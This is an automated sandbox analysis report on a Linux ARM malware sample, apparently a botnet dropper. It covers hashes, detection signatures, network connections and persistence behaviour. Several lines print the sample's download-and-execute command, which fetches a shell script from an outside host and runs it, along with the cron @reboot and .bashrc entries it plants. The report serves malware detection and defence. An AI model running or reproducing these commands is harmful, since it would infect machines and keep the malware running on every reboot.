Linux Analysis Report
arm7.elf

Overview

General Information

Sample name: arm7.elf
Analysis ID: 1541201
MD5: f89985f03f8a27ab418e05bc232e4387
SHA1: b57e7df8cf4013be718f56be205e14919101e87a
SHA256: 15af70f91b8099d491f6d891cd063301b8e40e063aa0554294ec28cab71753c6
Tags: elfuser-abuse_ch
Infos:

Detection

Score: 64
Range: 0 - 100
Whitelisted: false

Signatures

Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions
Sample tries to persist itself using cron
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection

barindex
Source: arm7.elf ReversingLabs: Detection: 15%
Source: .bashrc.32.dr String: cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
Source: tmp.hGK4g5.38.dr String: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
Source: bot.conf.32.dr String: exec cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh

Networking

barindex
Source: global traffic TCP traffic: 213.182.204.57 ports 24368,2,3,4,6,8
Source: global traffic TCP traffic: 192.168.2.23:46462 -> 88.151.195.22:7994
Source: global traffic TCP traffic: 192.168.2.23:39896 -> 213.182.204.57:24368
Source: /tmp/arm7.elf (PID: 6218) Socket: 127.0.0.1:1172 Jump to behavior
Source: global traffic TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown UDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknown UDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknown UDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknown UDP traffic detected without corresponding DNS query: 70.34.254.19
Source: unknown UDP traffic detected without corresponding DNS query: 202.61.197.122
Source: global traffic DNS traffic detected: DNS query: kingstonwikkerink.dyn
Source: bot.conf.32.dr String found in binary or memory: http://hailcocks.ru/wget.sh;
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal64.troj.linELF@0/3@3/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 6228) Crontab executable: /usr/bin/crontab -> crontab -l Jump to behavior
Source: /bin/sh (PID: 6227) Crontab executable: /usr/bin/crontab -> crontab - Jump to behavior
Source: /tmp/arm7.elf (PID: 6218) File written: /root/.bashrc Jump to behavior
Source: /usr/bin/crontab (PID: 6227) File: /var/spool/cron/crontabs/tmp.hGK4g5 Jump to behavior
Source: /usr/bin/crontab (PID: 6227) File: /var/spool/cron/crontabs/root Jump to behavior
Source: /tmp/arm7.elf (PID: 6218) File: /root/.bashrc Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6410/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6035/cmdline Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6357/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6412/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6411/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6391/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6390/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6403/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6402/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6405/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6404/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6407/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6406/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6409/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6408/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6362/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6361/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6364/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6386/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6363/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6366/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6388/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6365/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6387/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6401/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6389/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6360/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/1/cmdline Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6359/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6414/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6358/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6413/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6416/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6415/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6418/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6417/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6290) File opened: /proc/6419/status Jump to behavior
Source: /tmp/arm7.elf (PID: 6220) Shell command executed: /bin/sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -" Jump to behavior
Source: /tmp/arm7.elf (PID: 6229) Shell command executed: /bin/sh -c "/sbin/initctl start bot" Jump to behavior
Source: /usr/bin/dash (PID: 6197) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.slrTgTVxmA /tmp/tmp.wyNFB4lbH9 /tmp/tmp.mxqeE7vjoI Jump to behavior
Source: /usr/bin/dash (PID: 6209) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.slrTgTVxmA /tmp/tmp.wyNFB4lbH9 /tmp/tmp.mxqeE7vjoI Jump to behavior
Source: submitted sample Stderr: no crontab for root/bin/sh: 1: /sbin/initctl: not found: exit code = 0
Source: /tmp/arm7.elf (PID: 6218) Queries kernel information via 'uname': Jump to behavior
Source: arm7.elf, 6218.1.0000558f057b1000.0000558f05928000.rw-.sdmp, arm7.elf, 6235.1.0000558f057b1000.0000558f05928000.rw-.sdmp, arm7.elf, 6294.1.0000558f057b1000.0000558f05928000.rw-.sdmp, arm7.elf, 6236.1.0000558f057b1000.0000558f05928000.rw-.sdmp Binary or memory string: U!/etc/qemu-binfmt/arm
Source: arm7.elf, 6218.1.0000558f057b1000.0000558f05928000.rw-.sdmp, arm7.elf, 6235.1.0000558f057b1000.0000558f05928000.rw-.sdmp, arm7.elf, 6294.1.0000558f057b1000.0000558f05928000.rw-.sdmp, arm7.elf, 6236.1.0000558f057b1000.0000558f05928000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: arm7.elf, 6218.1.00007fff4ba97000.00007fff4bab8000.rw-.sdmp, arm7.elf, 6235.1.00007fff4ba97000.00007fff4bab8000.rw-.sdmp, arm7.elf, 6294.1.00007fff4ba97000.00007fff4bab8000.rw-.sdmp, arm7.elf, 6236.1.00007fff4ba97000.00007fff4bab8000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
Source: arm7.elf, 6218.1.00007fff4ba97000.00007fff4bab8000.rw-.sdmp, arm7.elf, 6235.1.00007fff4ba97000.00007fff4bab8000.rw-.sdmp, arm7.elf, 6294.1.00007fff4ba97000.00007fff4bab8000.rw-.sdmp, arm7.elf, 6236.1.00007fff4ba97000.00007fff4bab8000.rw-.sdmp Binary or memory string: ^+x86_64/usr/bin/qemu-arm/tmp/arm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm7.elf
Source: arm7.elf, 6294.1.00007fff4ba97000.00007fff4bab8000.rw-.sdmp Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs